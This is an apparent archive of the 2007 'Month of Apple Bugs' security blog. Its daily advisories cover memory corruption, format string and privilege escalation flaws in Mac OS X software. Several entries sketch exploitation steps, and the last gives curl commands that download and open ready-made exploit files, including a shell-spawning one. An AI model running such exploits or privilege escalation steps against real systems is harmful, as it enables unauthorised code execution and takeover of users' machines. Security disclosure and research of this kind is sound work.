Tuesday, January 30, 2007

MOAB-30-01-2007: Multiple Apple Software Format String Vulnerabilities

Multiple developers of Apple based software including Apples own developers seem to have a misunderstanding of how to properly use NSBeginAlertSheet, NSBeginCriticalAlertSheet, NSBeginInformationalAlertSheet, NSGetAlertPanel, NSGetCriticalAlertPanel, NSGetInformationalAlertPanel, NSReleaseAlertPanel, NSRunAlertPanel, NSRunCriticalAlertPanel, NSRunInformationalAlertPanel, and NSLog.

Further information:

Monday, January 29, 2007

MOAB-29-01-2007: Apple iChat Bonjour Multiple Denial of Service Vulnerabilities

Apple iChat Bonjour functionality is affected by several remotely exploitable denial of service flaws which can be triggered via advertising presence services over multicast DNS.

Further information:

Sunday, January 28, 2007

MOAB-28-01-2007: Apple crashdump Privilege Escalation Vulnerability

crashdump follows symlinks within the /Library/Logs/CrashReporter/ directory, allowing admin-group users to execute arbitrary code and overwrite files with elevated privileges. In couple with a specially crafted Mach-O binary, this can be used to write a malicious crontab entry, which will run with root privileges.

Saturday, January 27, 2007

MOAB-27-01-2007: Telestream Flip4Mac WMV Parsing Memory Corruption Vulnerability

Flip4Mac fails to properly handle WMV files with a crafted ASF_File_Properties_Object size field, leading to an exploitable memory corruption condition, which can be abused remotely for arbitrary code execution.

Further information:
This can be abused remotely even via Mail.app (sending the movie attached in the message), Safari, etc.

Friday, January 26, 2007

MOAB-26-01-2007: Apple Installer Package Filename Format String Vulnerability

Apple Installer fails to properly handle package filename strings. It's a affected by a typical format string vulnerability, which can lead to a denial of service condition or arbitrary code execution.

Further information:
See: Sarcasm.

Also, many thanks to an anonymous supporter for donating to the project. We would like to note also that we don't endorse any actions taken against anyone who openly criticizes or disagrees with the project.

Thursday, January 25, 2007

MOAB-25-01-2007: Apple CFNetwork HTTP Response Denial of Service

CFNetwork fails to handle certain HTTP responses properly, causing the _CFNetConnectionWillEnqueueRequests() function to dereference a NULL pointer, leading to a denial of service condition.

Further information:
Many thanks to Craig Loomis, Greg Slepak and a previous supporter for donating to the project. The mark is at $472.93 USD now, so we are very close to the goal. Again, many thanks to everyone who has contributed, with both donations and feedback.

Wednesday, January 24, 2007

MOAB-24-01-2007: Apple Software Update Catalog Filename Format String Vulnerability

Software Update fails to properly handle the filename strings containing the swutmp extension. It's a affected by a typical format string vulnerability, which can lead to a denial of service condition or arbitrary code execution.

Further information:

Tuesday, January 23, 2007

MOAB-23-01-2007: Apple QuickDraw GetSrcBits32ARGB() Memory Corruption Vulnerability

QuickDraw is integrated in Mac OS X since very early versions, used by Quicktime and any other application that needs to handle PICT images. A vulnerability exists in the handling of ARGB records (Alpha RGB) within PICT images, that leads to an exploitable memory corruption condition (ex. denial of service, so-called crash, which can be used to gain root privileges in combination with MOAB-22-01-2007).

For further information:
Apple has released a fix to MOAB-01-01-2007: Security Update 2007-001. They finally acknowledge the MoAB, with some PR crediting wizardry, aka 'let's mention but not explicitly say we are broken'. 22 days to fix a remote arbitrary code execution issue in one of their most extended products, distributed with working exploits for both Microsoft Windows and Mac OS X versions can be considered acceptable timing. Come on, it's not that difficult to change a strcpy() call... is it?

Monday, January 22, 2007

MOAB-22-01-2007: Apple UserNotificationCenter Privilege Escalation Vulnerability

UserNotificationCenter retains wheel privileges on execution time, and still has a UID associated with the current user. Because of this, it> will attempt to run any InputManager provided by the user. Code within the input manager will run under wheel privileges. In combination with diskutil and a wheel-writable setuid binary, this allows unprivileged users to gain root privileges.
Further information:
Update: updated exploit (now fat binaries are used, thus exploit should work on a system without XCode and related developer tools; source code is provided to avoid the usual FUD about alleged 'root kits' and non-sense), release information, etc. KF worked hard on getting stuff up due to connectivity issues. He deserves a thumbs-up from everyone.

Sunday, January 21, 2007

MOAB-21-01-2007: System Preferences writeconfig Local Privilege Escalation Vulnerability

The preference panes setuid helper, writeconfig, makes use of a shell script which lacks of PATH sanitization, allowing users to execute arbitrary binaries under root privileges.

Further information:
This week will be a really interesting one.
"Also, I’m pretty sure the SoD realized that writing to an SUID executable clears the SUID bit." -- Thomas Ptacek, Matasano.
Actually, the problem isn't 'writing to setuid binaries' but the fact that diskutil "repairs permissions", thus after replacing directories, binaries and any other file, the original modes are set back. In other words: replace setuid binary with one of your choice (given that a BOM/Bill of Materials file acknowledges it's existence and properties), run diskutil repair permissions, profit. It remains unknown if Thomas just didn't understand the point or simply continues his usual blog wagon. Probably both.

Saturday, January 20, 2007

MOAB-20-01-2007: Apple iChat aim:// URL Handler Format String Vulnerability

Apple iChat AIM URI scheme handling is affected by a classic format string vulnerability, allowing remote users to cause a denial of service condition or arbitrary code execution.
Further information:

Friday, January 19, 2007

MOAB-19-01-2007: Transmit.app ftps:// URL Handler Heap Buffer Overflow

Transmit does not allocate enough space when dealing with the string passed on via the ftps:// URL handler, leading to an exploitable heap-based buffer overflow condition.

For further information:
We are releasing miscellaneous issues in order to have a slot full of interesting releases for this next week, that need to be properly worked on. To all of those asking 'Is that an Apple bug?' , please refer to the FAQ:
  1. Are Apple products the only one target of this initiative?
  2. Not at all, but they are the main focus. We'll be looking over popular OS X applications as well.

Thursday, January 18, 2007

MOAB-18-01-2007: Rumpus Multiple Vulnerabilities

rumpusd is vulnerable to different remotely exploitable heap-based buffer overflows, denial of service conditions and local privilege escalation issues. Due to the fact that Rumpus works under root privileges, successful exploitation by unprivileged users would allow a full compromise of the system.

Most of these issues are related to both FTP and HTTP request parsing, as well as insecure use of the system() function and incorrect permissions and/or handling of setuid binaries.
Further information:

Wednesday, January 17, 2007

MOAB-17-01-2007: Apple SLP Daemon Service Registration Buffer Overflow Vulnerability

slpd is vulnerable to a buffer overflow condition when processing the attr-list field of a registration request, leading to an exploitable denial of service condition and potential arbitrary execution. It would allow unprivileged local (and possibly remote) users to execute arbitrary code under root privileges.

For further information:
This issue was reported to Apple on 8/2/06 5:31 PM.

Tuesday, January 16, 2007

MOAB-16-01-2007: Multiple Colloquy IRC Format String Vulnerabilities

Colloquy is vulnerable to a format string vulnerability in the handling of INVITE requests, that can be abused by remote users and requires no interaction at all, leading to a denial of service and potential arbitrary code execution.

Further information:

Monday, January 15, 2007

MOAB-15-01-2007: Multiple Mac OS X Local Privilege Escalation Vulnerabilities

Multiple binaries inside the /Applications directory tree are setuid root, but remain writable by users in the admin group (ex. first user by default in a non-server Mac OS X installation), allowing privilege escalation. A malicious user can overwrite the binaries and perform a disk permissions repair operation via the diskutil tool, effectively setting back the default ownership and permissions (root setuid).

Further information:
Thanks to Ian Silvester for donating to the project!

Sunday, January 14, 2007

MOAB-14-01-2007: AppleTalk ATPsndrsp() Heap Buffer Overflow Vulnerability

The _ATPsndrsp function is vulnerable to a heap-based buffer overflow condition, due to insufficient checking of user input. This leads to a denial of service condition and potential arbitrary code execution by unprivileged users.

For further information:
More to come. In case you want to support the project, consider a donation for the 'get a mini' fund-raising :-). As soon as it gets worked out, advertisement should probably vanish. Hopefully.

Saturday, January 13, 2007

MOAB-13-01-2007: Apple DMG HFS+ do_hfs_truncate() Denial of Service Vulnerability

A specially crafted HFS+ filesystem in a DMG image can cause the do_hfs_truncate() function to panic the kernel (denial of service), when attempting to remove a file from the mounted filesystem. This issue can't lead to arbitrary code execution, although there's a significant risk of local HFS+ filesystems corruption.

Further information:

Friday, January 12, 2007

MOAB-12-01-2007: Apple DMG UFS ufs_lookup() Denial of Service Vulnerability

A specially crafted UFS filesystem in a DMG image can cause the ufs_lookup() function to call ufs_dirbad() when a corrupted directory entry is being read, leading to a kernel panic (denial of service).
For further information:

We would like to thank evan1138 for his generous donation to the project, as well as his constructive feedback and comments.

Thursday, January 11, 2007

MOAB-11-01-2007: Apple DMG UFS byte_swap_sbin() Integer Overflow Vulnerability

The byte_swap_sbin() function, one of the UFS byte swapping routines (this code isn't present in FreeBSD and it's Mac OS X XNU-specific; used for compatibility of filesystem streams between little and big-endian systems) is affected by a integer overflow vulnerability, leading to an exploitable denial of service condition.

For further information:
You may have noticed some changes. As KF would say, "we are more respectable now". The issues will still feature hilarious artwork by talented fellow GC. Enjoy.

Wednesday, January 10, 2007

MOAB-10-01-2007: Apple DMG UFS ffs_mountfs() Integer Overflow Vulnerability

The ffs_mountfs() function, part of the UFS filesystem handling code (shared between FreeBSD and Mac OS X XNU) is affected by an integer overflow vulnerability, leading to an exploitable denial of service condition and potential arbitrary code execution.

For further information:
Note: Apple requested confirmation more than one month ago, when the original FreeBSD UFS vulnerabilities got published in the MoKB. This serves as confirmation that the issues obviously exist in both XNU and FreeBSD. It wasn't that difficult to verify, given that the UFS code is exactly the same in both.

We'll be releasing kernel-related issues for some time (mixed with remote user-land issues, just to keep it fun). Mostly DMG related flaws that didn't make it to the MoKB schedule.

Tuesday, January 9, 2007

MOAB-09-01-2007: Apple Finder DMG Volume Name Memory Corruption

Finder is affected by a memory corruption vulnerability, which leads to an exploitable denial of service condition and potential arbitrary code execution, that can be triggered by DMG images.

For further information:

Monday, January 8, 2007

MOAB-08-01-2007: Application Enhancer (APE) Local Privilege Escalation

Application Enhancer (APE) is affected by different issues, one of them is a local privilege escalation vulnerability which allows local users to gain root privileges in the system by either patching the ApplicationEnhancer binary or replacing it. This binary is executed with root privileges and drops them (via setuid to current user id), but the file is actually writable, as well as the whole tree under /Library/Frameworks, allowing the mentioned condition to be abused for privilege escalation.
Further information:

Update: We just received an e-mail suggesting that Unsanity might have fixed this issue silently (replacing their available DMG of the 2.0.2 release with a new one). Until we verify that, we can't assume they really did it (which would be the most probable reaction at their side, though). A short (yet detailed) explanation is available at the MoAB Fixes Google Group.

: Not fixed, yet:

MD5 (../ape/ape-202.dmg) = b9388ac7a64d03a07a565906b6ef4510
MD5 (../ape/silent/ape-202-orig_after.dmg) = b9388ac7a64d03a07a565906b6ef4510

Sunday, January 7, 2007

MOAB-07-01-2007: OmniWeb Javascript alert() Format String Vulnerability

OmniWeb is affected by a format string vulnerability in the handling of Javascript alert() function, which could allow remote arbitrary code execution.
Some hate e-mail examples available from the Rixstep fellows at The ORLANDO Files.

Update: After contacting Omni Group they have provided a new OmniWeb version, 5.5.2, which fixes this issue. Prompt response and fix times. Way to go! (missed to credit KF, though)

Saturday, January 6, 2007

MOAB-06-01-2007: Multiple Vendor PDF Document Catalog Handling Vulnerability

The current PDF specification is affected by a design flaw: a rogue Pages entry or malicious catalog dictionary could cause a denial of service (memory corruption condition, memory leakage, etc) or potential arbitrary code execution in the reader application.
Further information:
One of those nice issues you "can't" find with so-called fuzzing, but instead reading the format specification...

Friday, January 5, 2007

MOAB-05-01-2007: Apple DiskManagement BOM Local Privilege Escalation Vulnerability

A vulnerability in the handling of BOM files allows to set rogue permissions on the filesystem via the 'diskutil' tool. This can be used to execute arbitrary code and escalate privileges. A malicious user could create a BOM declaring new permissions for specific filesystem locations (ex. binaries, cron and log directories, etc). Once 'diskutil' runs a permission repair operation the rogue permissions would be set, allowing to plant a backdoor, overwrite resources or simply gain root privileges.

For further information:

Thursday, January 4, 2007

MOAB-04-01-2007: iLife iPhoto Photocast XML title Format String Vulnerability

A format string vulnerability in the handling of iPhoto XML feeds title field allows potential remote arbitrary code execution.

For further information:

Wednesday, January 3, 2007

MOAB-03-01-2007: Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability

A month ago, a vulnerability in QuickTime was exploited to spread a worm in MySpace. The vulnerability was first published by pdp. In his article, pdp describes how HREFTrack attribute in .mov files can be used for malicious scripting. The MySpace worm abused this vulnerability in a cross-site scripting attack vector.

This MoAB issue shows that this vulnerability can also be used in a cross-zone scripting attack which could allow, in combination with other vulnerabilities, to remotely execute arbitrary code on the user's machine, as well as disclosure of the filesystem contents.Thanks to Aviv Raff for contributing this nice issue. Thanks to pdp for working around Quicktime scripting issues too.
For further information:

Tuesday, January 2, 2007

MOAB-02-01-2007: VLC Media Player udp:// Format String Vulnerability

A format string vulnerability exists in the handling of the udp:// URL handler. By supplying a specially crafted string, a remote attacker could cause an arbitrary code execution condition, under the privileges of the user running VLC.

Monday, January 1, 2007

MOAB-01-01-2007: Apple Quicktime rtsp URL Handler Stack-based Buffer Overflow

A vulnerability exists in the handling of the rtsp:// URL handler. By supplying a specially crafted string (rtsp:// [random] + colon + [299 bytes padding + payload]), an attacker could overflow a stack-based buffer, using either HTML, Javascript or a QTL file as attack vector, leading to an exploitable remote arbitrary code execution condition.
For further information:
Happy New Year!

Update: An example QTL file exploiting this issue (pwnage.qtl) is available (it will say 'happy new year' via /usr/bin/say, and expects the command string to be located at 0x17a053c, tested on Mac OS X 10.4.8 8L2127, x86 architecture). If it doesn't work on your system, use the exploit to generate another QTL with your own options or the shell spawn variant (pwnage-shell.qtl, 100% reliable for a current up-to-date x86-based OS X system). Usage:

$ curl http://projects.info-pull.com/moab/bug-files/pwnage.qtl -o pwnage.qtl
$ open pwnage.qtl
$ curl http://projects.info-pull.com/moab/bug-files/pwnage-shell.qtl -o pwnage-shell.qtl
$ open pwnage-shell.qtl